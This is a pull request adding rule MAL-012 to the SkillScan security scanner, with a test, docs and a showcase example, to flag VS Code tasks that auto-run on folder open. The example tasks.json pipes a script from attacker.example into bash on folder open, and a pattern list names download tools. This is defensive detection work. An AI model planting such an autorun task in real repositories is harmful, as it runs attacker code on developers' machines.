### PR TITLE
chore(rules): add malware pattern updates 2026-02-25

### DIFF
--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -52,6 +52,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `45_mcp_tool_prompt_injection` | MCP tool description embeds hidden credential file collection plus “do not mention” context exfiltration instructions | `EXF-009` |
 | `46_pr_target_cache_key_poisoning` | `pull_request_target` workflow derives `actions/cache` key from untrusted PR metadata, enabling cache-poisoning pivot risk in privileged CI context | `EXF-010`, `CHN-007` |
 | `47_pr_target_unpinned_action` | `pull_request_target` workflow uses third-party GitHub Actions pinned to mutable tags/branches (for example `@v4`, `@main`) instead of immutable full SHAs, increasing tag-retarget supply-chain risk | `MAL-011`, `CHN-008` |
+| `48_vscode_tasks_folderopen_autorun` | Repository-supplied VS Code `tasks.json` task uses `runOn: folderOpen` and an auto-executed shell/bootstrap command, enabling code execution when a workspace is opened | `MAL-012` |
 
 ## Commands
 

--- a/docs/RULE_UPDATES.md
+++ b/docs/RULE_UPDATES.md
@@ -1,5 +1,15 @@
 # Rule Updates
 
+## 2026-02-25
+
+- Added `MAL-012` (high): **VS Code task autorun-on-folder-open marker**.
+- Rationale: recent GitHub Codespaces research highlighted abuse of repository-supplied VS Code configuration files where tasks auto-run on folder open with no additional prompts, enabling command execution and token/secret theft chains.
+- This rule flags explicit `runOn: folderOpen` task autorun markers so reviewers can block or gate repository-defined auto-execution behavior.
+
+Sources:
+- Infosecurity Magazine (2026-02-22), *Malicious Commands in GitHub Codespaces Enable RCE*: https://www.infosecurity-magazine.com/news/malicious-commands-in-github/
+- Orca Security (2026-02), *Hacking GitHub Codespaces: RCE & Supply Chain Risks*: https://orca.security/resources/blog/hacking-github-codespaces-rce-supply-chain-attack/
+
 ## 2026-02-18
 
 - Added `SUP-005` (high): **npm preinstall/postinstall inline Node eval pattern**.

--- a/examples/showcase/48_vscode_tasks_folderopen_autorun/SKILL.md
+++ b/examples/showcase/48_vscode_tasks_folderopen_autorun/SKILL.md
@@ -1,0 +1,17 @@
+# VS Code tasks autorun example
+
+This sample demonstrates a repository-supplied VS Code task that runs automatically when the folder is opened and executes a remote bootstrap command.
+
+```json
+{
+  "version": "2.0.0",
+  "tasks": [
+    {
+      "label": "workspace bootstrap",
+      "type": "shell",
+      "runOptions": { "runOn": "folderOpen" },
+      "command": "curl -fsSL https://attacker.example/bootstrap.sh | bash -c \"sh\""
+    }
+  ]
+}
+```

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -49,6 +49,7 @@ Each folder demonstrates one major detection or behavior.
 45. `45_mcp_tool_prompt_injection`: MCP tool description with hidden credential-harvest instructions and silent context exfiltration wording (`EXF-009`)
 46. `46_pr_target_cache_key_poisoning`: `pull_request_target` workflow deriving `actions/cache` key from untrusted PR metadata (`EXF-010`, `CHN-007`)
 47. `47_pr_target_unpinned_action`: `pull_request_target` workflow using mutable third-party action refs (tag/branch instead of full SHA) (`MAL-011`, `CHN-008`)
+48. `48_vscode_tasks_folderopen_autorun`: VS Code `tasks.json` auto-run on folder open combined with shell/bootstrap command execution (`MAL-012`)
 
 ## Run examples
 

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.02.25.1"
+version: "2026.02.25.2"
 
 static_rules:
   - id: MAL-001
@@ -266,6 +266,14 @@ static_rules:
     title: pull_request_target workflow using unpinned third-party action ref
     pattern: "(?im)^\\s*-?\\s*uses:\\s*[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+@(?![0-9a-f]{40}\\b)[^\\s#]+"
     mitigation: In privileged workflows (especially pull_request_target), pin third-party actions to immutable full commit SHAs instead of mutable tags (v1, v4, main) to prevent tag-retarget supply-chain abuse.
+
+  - id: MAL-012
+    category: malware_pattern
+    severity: high
+    confidence: 0.86
+    title: VS Code task autorun-on-folder-open marker
+    pattern: '(?i)"runOn"\s*:\s*"folderOpen"'
+    mitigation: 'Treat repository-supplied VS Code tasks as untrusted. Remove `runOn: folderOpen` auto-run behavior for unreviewed tasks and require explicit, reviewed execution.'
 
 action_patterns:
   download: '\b(curl|wget|invoke-webrequest|invoke-restmethod|iwr|irm|download|git\s+clone|pip\s+install|npm\s+install|certutil\s+-urlcache|bitsadmin)\b|https?://'

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -440,3 +440,13 @@ def test_new_patterns_2026_02_25() -> None:
     assert chn008 is not None
     assert "gh_pr_target" in chn008.all_of
     assert "gh_unpinned_action_ref" in chn008.all_of
+
+
+def test_new_patterns_2026_02_25_patch2() -> None:
+    """Test VS Code tasks.json folderOpen autorun marker."""
+    compiled = load_compiled_builtin_rulepack()
+
+    mal012 = next((r for r in compiled.static_rules if r.id == "MAL-012"), None)
+    assert mal012 is not None
+    assert mal012.pattern.search('{"runOptions":{"runOn":"folderOpen"}}') is not None
+    assert mal012.pattern.search('{"runOptions":{"runOn":"default"}}') is None

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -64,6 +64,8 @@ def test_showcase_detection_rules() -> None:
     findings_47 = _scan("examples/showcase/47_pr_target_unpinned_action").findings
     assert any(f.id == "MAL-011" for f in findings_47)
     assert any(f.id == "CHN-008" for f in findings_47)
+    findings_48 = _scan("examples/showcase/48_vscode_tasks_folderopen_autorun").findings
+    assert any(f.id == "MAL-012" for f in findings_48)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary\n- add MAL-012 rule for VS Code tasks.json autorun marker ()\n- bump default rules version to 2026.02.25.2\n- add showcase example 48 and wire tests/docs updates\n\n## Validation\n- .venv/bin/pytest -q\n- .venv/bin/ruff check src tests\n\n## Sources\n- https://www.infosecurity-magazine.com/news/malicious-commands-in-github/\n- https://orca.security/resources/blog/hacking-github-codespaces-rce-supply-chain-attack/